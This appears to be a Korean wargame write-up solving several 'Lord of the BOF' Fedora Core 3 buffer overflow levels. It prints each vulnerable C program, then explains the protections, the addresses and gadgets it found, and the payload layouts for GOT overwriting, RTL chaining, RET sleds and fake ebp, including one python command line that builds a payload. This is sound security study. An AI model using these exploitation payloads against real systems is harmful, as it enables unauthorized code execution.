/*
    The Lord of the BOF : The Fellowship of the BOF
    - dark_stone
    - Remote BOF on Fedora Core 3
    - hint : GOT overwriting again
    - port : TCP 8888
*/

#include <stdio.h>

// magic potion for you
void pop_pop_ret(void)
{
    asm("pop %eax");
    asm("pop %eax");
    asm("ret");
}
 
int main()
{
    char buffer[256];
    char saved_sfp[4];
    int length;
    char temp[1024];

    printf("dark_stone : how fresh meat you are!\n");
    printf("you : ");
    fflush(stdout);

    // give me a food
    fgets(temp, 1024, stdin);

    // for disturbance RET sleding
    length = strlen(temp);
  
    // save sfp
    memcpy(saved_sfp, buffer+264, 4);
 
    // overflow!!
    strcpy(buffer, temp);

    // restore sfp
    memcpy(buffer+264, saved_sfp, 4);

            // disturbance RET sleding
          memset(buffer+length, 0, (int)0xff000000 - (int)(buffer+length));

    // buffer cleaning
    memset(0xf6ffe000, 0, 0xf7000000-0xf6ffe000);

    printf("%s\n", buffer);
}




이쯤되면 문제 패턴이 예상가능해진다. 역시나 전레벨 문제+remote.. remote를 제외하고 달라진점은 버퍼를 비운다는 점이다. 어차피 GOT Overwrite로 풀꺼라 신경쓰이지는 않지만.

기법정리
RTL chaining으로 /bin/sh가젯을 하나씩 구해 bss에 overwrite 후 system호출&인자 bss   --> ascii armor 우회불가능(ftz level11을 이렇게 풀었다)

RTL chaining으로 system주소를 1 byte씩 직접 printf@got 에 overwrite, print@plt 호출후 AAAA+&/bin/sh

지금까지 사용한 exploit방법인데 이번엔 좀 다르게 풀겠다

custom stack을 bss로 두고 RTL chaining으로 system주소를 하나씩 overwrite 후 printf@got에 bss를 한번에 overwrite, print@plt 호출후 AAAA+&/bin/sh

주소를 구해보자

strcpy.plt : 0x8048438       
printf.plt : 0x8048408 
printf.got : 0x804984c
pop pop ret : 0x80484f3
.bss : 0x08049868           
system : 0x7507c0           
    c0 0x80484d0
    07 0x804817c
    75 0x80482b4
    00 0x8049804
/bin/sh : 0x833603


payload 구성 : dummy * 268
+ strcpy.plt + pop pop ret + bss+0 + system[0]
+ strcpy.plt + pop pop ret + bss+1 + system[1]
+ strcpy.plt + pop pop ret + bss+2 + system[2]
+ strcpy.plt + pop pop ret + bss+3 + system[3]
+ strcpy.plt + pop pop ret + printf@got + bss
+printf@plt + AAAA+ &/bin/sh

원격으로 쉘을 따자

/*
    The Lord of the BOF : The Fellowship of the BOF
    - evil_wizard
    - Local BOF on Fedora Core 3
    - hint : GOT overwriting
*/

// magic potion for you
void pop_pop_ret(void)
{
    asm("pop %eax");
    asm("pop %eax");
    asm("ret");
}
 
int main(int argc, char *argv[])
{
    char buffer[256];
    char saved_sfp[4];
    int length;

    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }

    // for disturbance RET sleding
    length = strlen(argv[1]);
   
        // healing potion for you
        setreuid(geteuid(), geteuid());
        setregid(getegid(), getegid());

    // save sfp
    memcpy(saved_sfp, buffer+264, 4);
 
    // overflow!!
    strcpy(buffer, argv[1]);

    // restore sfp
    memcpy(buffer+264, saved_sfp, 4);

        // disturbance RET sleding
        memset(buffer+length, 0, (int)0xff000000 - (int)(buffer+length));

        printf("%s\n", buffer);
}

중요한 가젯인 pop pop ret를 magic potion이라면서 대놓고준다.
RET sleding과 fake ebp를 막아놓았다.

힌트에도 나와있듯이 GOT overwrite를 이용해 풀자

strcpy로 printf.got를 system으로 바꿔 system을 실행할것이다. pop pop ret가 주어졌으니 RTL chaining 으로 프로그램 내에서 system의 주소 가젯을 구해 printf.got를 overwrite한다. 그뒤 /bin/sh의 주소를 찾아 인자로 주자.

system과 pop pop ret 가젯은 objdump로 구하고 plt와 got는 gdb로 구하자

(쓰지않는 함수주소도 일단 구하고봤다)
execve.plt : 0x715490  
memcpy.plt : 0x8048434
strcpy.plt  : 0x8048494  -> \x94\x84\x04\x08
memset.plt : 0x8048474
printf.plt : 0x8048424  printf.got : 0x8049884  -> \x84\x98\x04\x08
&system : 0x7507c0      c0  07  75  00  gadget
            c0 : 0x8048535  \x35\x85\x04\x08
            07 : 0x8048388 \x88\x83\x04\x08
            75 : 0x80482c8 \xc8\x82\x04\x08
            00 : 0x8049840 \x40\x98\x04\x08
pop pop ret : 0x804854f  -> \x4f\x85\x04\x08

페이로드
| dummy*268 |
| strcpy@plt | pop pop ret | printf.got | system[0] gadget |
| strcpy@plt | pop pop ret | printf.got+1 | system[1] gadget |
| strcpy@plt | pop pop ret | printf.got+2 | system[2] gadget |
| strcpy@plt | pop pop ret | printf.got+3 | system[3] gadget |
| printf@plt | dummy[4] | &/bin/sh |

/*
    The Lord of the BOF : The Fellowship of the BOF
    - hell_fire
    - Remote BOF on Fedora Core 3
    - hint : another fake ebp or got overwriting
    - port : TCP 7777
*/

#include <stdio.h>

int main()
{
    char buffer[256];
    char saved_sfp[4];
    char temp[1024];
 
    printf("hell_fire : What's this smell?\n");
    printf("you : ");
    fflush(stdout);

    // give me a food
    fgets(temp, 1024, stdin);
  
    // save sfp
    memcpy(saved_sfp, buffer+264, 4);
 
    // overflow!!
    strcpy(buffer, temp);

    // restore sfp
    memcpy(buffer+264, saved_sfp, 4);

    printf("%s\n", buffer);
}

remote bof라 이전 레벨처럼 링크를 이용한 공격이 불가능하다. 그 이유는 원본 hell_fire에는 setuid가 걸려 있지않고, xinetd으로 동작하는 hell_fire에서 쉘을 따야 하기때문이다.


전에 iron_golem을 풀때 system과 exec함수의 차이점을 공부하는 도중 https://www.joinc.co.kr/w/man/3/system 에서 'system() 함수는 /bin/sh -c string을 호출해 string에 지정된 명령어를 실행하고(생략)/bin/sh를 실행시키기 위한 execve()의 호출...' 에서 system함수에서 인자를받아 execve와 "/bin/sh"를 호출하는 부분이 있다는것을 알수 있다.

간단히 말하면 system함수 내에 do_system에서 "/bin/sh" 를 호출하는 부분이 있는데, ret에 이주소를 넣으면 쉘이 실행된다.

먼저 스택구조를 보면
temp[1024]  | dummy1[??] | saved_sfp[4] | dummy2[??] | buffer[256] | dummy3[??] | sfp[4] | ret [4] |

더미값을 268개 줬을때 segmentation fault가 떴으므로 dummy3은 8이다.

system함수를 분석해보면 아래에 do_system을 호출한다.

do_system 내부에서 execve를 호출하므로 /bin/sh도 위 어딘가에서 인자로 받을것이다. 어딨는지모르겠으니 노가다로 하나씩...해보자

페이로드
| dummy[268] | &/bin/sh |

사실 이문제는 do_system아이디어를 다른곳에서 보고 푼것이기 때문에 제대로 풀었다고는 볼수없다.

힌트에서 준 another fake ebp는 main이 종료되고 돌아가는 함수의 sfp를 덮어쓴다는 방법이라는데 이부분도 공부해두면 좋을거같다.

/*
    The Lord of the BOF : The Fellowship of the BOF
    - dark_eyes
    - Local BOF on Fedora Core 3
    - hint : RET sleding
*/
int main(int argc, char *argv[])
{
    char buffer[256];
    char saved_sfp[4];
   
    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }
  
    // save sfp
    memcpy(saved_sfp, buffer+264, 4);
 
    // overflow!!
    strcpy(buffer, argv[1]);

    // restore sfp
    memcpy(buffer+264, saved_sfp, 4);

    printf("%s\n", buffer);
}

sfp값을 저장해두고 복구하기 때문에 fake ebp로 공략이 불가능하다. 힌트에서 알려준대로 RET sleding로 공격하자.

RET sleding : RET Sleding은 RET를 연속적으로 호출해 스택상의 스택포인터 위치를 위로 옮기는 방법이다.

ASCII Armor가 적용되어 있어 인자구성이 불가능할 때 스택에서 쓸 수 있는 인자를 찾는다. 인자의 위치까지 함수 실행 위치를 끌어올릴때 RET Sleding을 사용하면 직접 인자를 구성하지 않아도 공격이 가능하다. 여기서 RET는 어셈블리 명령어로 함수 에필로그의 LEAVE RET 과정중 하나인데 RET는 pop eip, jmp eip 명령어로 구성되어 있다. pop이 있어 RET를 한번 호출하면 esp가 증가하게 되는 것이다.

먼저 스택구조를 보자

gdb로 분석해보면
| saved_sfp[4] | dummy1[12] | buffer[256] | dummy[8] | sfp[4] | ret[4] | 이렇게 된다
dummy크기는 대충 때려맞추고 gdb로 분석했다.

이 문제에서도 execl함수를 쓸건데, 먼저 RET가젯과 스택에서 execl의 인자로 줄 수 있는 부분을 찾자

 
0x0083eff4를 execl의 인자로 주자
execl을 호출할땐 | &execl | &exit | Arg1 | 구조가 되므로 Arg1에 0x0083eff4의 주소가 들어가야 한다.

그럼 execl은 0x0083eff4의 주소에서 8을 뺀 주소에 위치해야 하므로
0xfee3cf2c - 8(&0x0083eff4) =0xfee3cf28

0xfee3cf28에서 execl을 실행하려면 RET sled를 세번 타야된다.

이제 인자로 0x0083ff4가 들어가고 실행되는 주소에 전 문제와 같이 exploit 코드를 짜서 심볼릭링크를 걸어준다.

 
0x0083eff4를 실행하면 나오는 주소인 0x0083ed3c를 심볼릭링크의 이름으로 걸어준다.

최종 페이로드

| (buf+sfp)dummy[268] | RET | RET | RET | &execl |

/*
    The Lord of the BOF : The Fellowship of the BOF
    - iron_golem
    - Local BOF on Fedora Core 3
    - hint : fake ebp
*/
int main(int argc, char *argv[])
{
    char buffer[256];

    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }

    strcpy(buffer, argv[1]);
    printf("%s\n", buffer);
}

소스는 매우 간단하지만 fedora성부터는 LOB와 달리 여러 보호 기법이 적용되어 있기 때문에 공격하기 훨씬 복잡해진다.

[환경 요약]
Stack Dummy : O
Down privileage of bash : O
Random Stack : O
Random Library : X
Random Program Binary Mapped : X
ASCII Armor : O
Non-Executable Stack : O
Non-Executable Heap : O
Stack Carany : X
Stack Smashing Protector : X


몇개 간단하게 설명을 하자면

Random Stack,heap(ASLR) : 스택,힙에 할당되는 주소를 프로그램이 실행될때마다 랜덤으로 배치해 고정적인 메모리주소를 참조하지 못하게 하는 보호기법

Non-Executable Stack,heap(Nx bit) : 스택과 힙영역에서의 실행권한을 제거해 해당 영역 내에서 쉘코드를 실행하지 못하게하는 보호기법

ASCII Armor : 공유 라이브러리 주소의 최상위 비트를 \x00으로 매핑해 공유라이브러리 주소가 포함된 공격코드 실행 중간에 \x00을 NULL값으로 인식하고 이를 기점으로 실행을 중단하게 만드는 보호기법. 때문에 RTL뒤에 인자전달이나 연속호출이 불가능

위의 보호기법때문에 스택내에서 직접 쉘코드를 실행시키는 공격기법과 일반적인 RTL공격은 불가능하게된다.


hint에 fake ebp가있어 fake ebp로 풀겠다.

ASCII Armor -> ASCII Armor가 적용되지 않는 got영역을 실행
ASLR -> fake ebp로 고정적 인자 참조가능


GOT는 나중에 ROP기법에서 매우 중요하게 쓰인다. PLT와 함께 미리 공부해두자

PLT (Procedure Linkage Table) :  함수 첫 호출시 함수의 실제주소를 알아내 호출 후 GOT에 함수주소 저장. 두번째 호출시 GOT에 저장된 주소를 참조해 함수호출

GOT (Global Offset Table) : 실제 함수 주소를 저장하는곳

PLT GOT 자세히알기 : https://bpsecblog.wordpress.com/2016/03/09/about_got_plt_2/


공격 시나리오는 이렇다

1. ASCII Armor가 걸려있지 않은 got영역을 이용한다.

2. fake ebp로 ebp를 got주소로 이동시킨다. 

3. got로 쉘을 실행시키는 프로그램을 심볼릭 링크로 연결해 최종적으로 쉘을 딴다.

gdb로 스택구성을 먼저 보자
| buffer[256] | dummy[8] | sfp[4] | ret[4] |
로 구성되어 있다.



구해야 하는것 : got.plt, execl 주소
execl : 0x00715720  (ASLR기법으로 첫바이트가 00임)
got.plt : 0x08049618

0x804954c <_DYNAMIC> : 0x00000001

got를 호출하면 0x00000001을 참조하는데, 이때 마지막바이트가 '\x01'이면 작성한 exploit 프로그램이 실행되게 심볼릭링크를 만들어준다.

쉘을 실행하는 exploit 프로그램

got에서 0x00000001 가 실행되면 exploit 프로그램이 실행된다.
그럼 공격 성공

그렇다면
| dummy[264] | &GOT | &execl |
이 페이로드가 되겠지만 이대로 공격을 해도 쉘이 따지지 않는다. execl의 프롤로그와 에필로그 과정에서 ebp와 esp를 건드리게 되고 fake ebp가 제대로 성공하지 않기 때문. 공격이 성공하려면 이러한 과정을 고려해야 한다.
 

execl의 첫부분이다. 기껏 fake ebp로 ebp를 got로 보내버렸는데

push %ebp / mov %esp,%ebp(프롤로그) 과정을 거치면 ebp가 엉뚱한데로 가버린다. 그래서 이부분을 무시하기위해 execl+3을 페이로드에 쓴다.

또 이 함수가 끝날때 leave / ret (에필로그) 부분에서 esp를 ebp로 옮기고 pop을 두번 수행하는데 이렇게되면 got+8주소가 실행된다. 때문에 페이로드에서 got-8을 쓰면 정상적으로 got를 실행하게 되는 것이다.

페이로드
| dummy[264] | &GOT-8 | &execl+3 |

./iron_golem `python -c 'print "A"*264 + "\x10\x96\x04\x08"+"\x23\x57\x7a\x00"'`

 

의문점 :

execl함수를 쓰는 이유는 아마 프로그램 실행권한을 가진 함수라 작성한 exploit 프로그램을 iron_golem 권한으로 실행시켜주기 때문인거 같은데.. 같은기능인 system함수로는 되지 않는다. execv함수로도 공격이 성공했는데 execl, execv와 system의 차이가 무엇인지 더 공부해야겠다.

결론 :

system함수는 exec와 fork의 조합이다. exec는 새로운 프로세스를 실행시킬때 현재 프로세스 메모리 공간에 덮어쓴다.

반면에 system은 fork로 새로운 자식 프로세스를 생성후 exec를 호출해 명령어를 실행하는 구조이다. 아마 system으로 공격이 실패한 이유가 이러한 차이때문인 것 같다.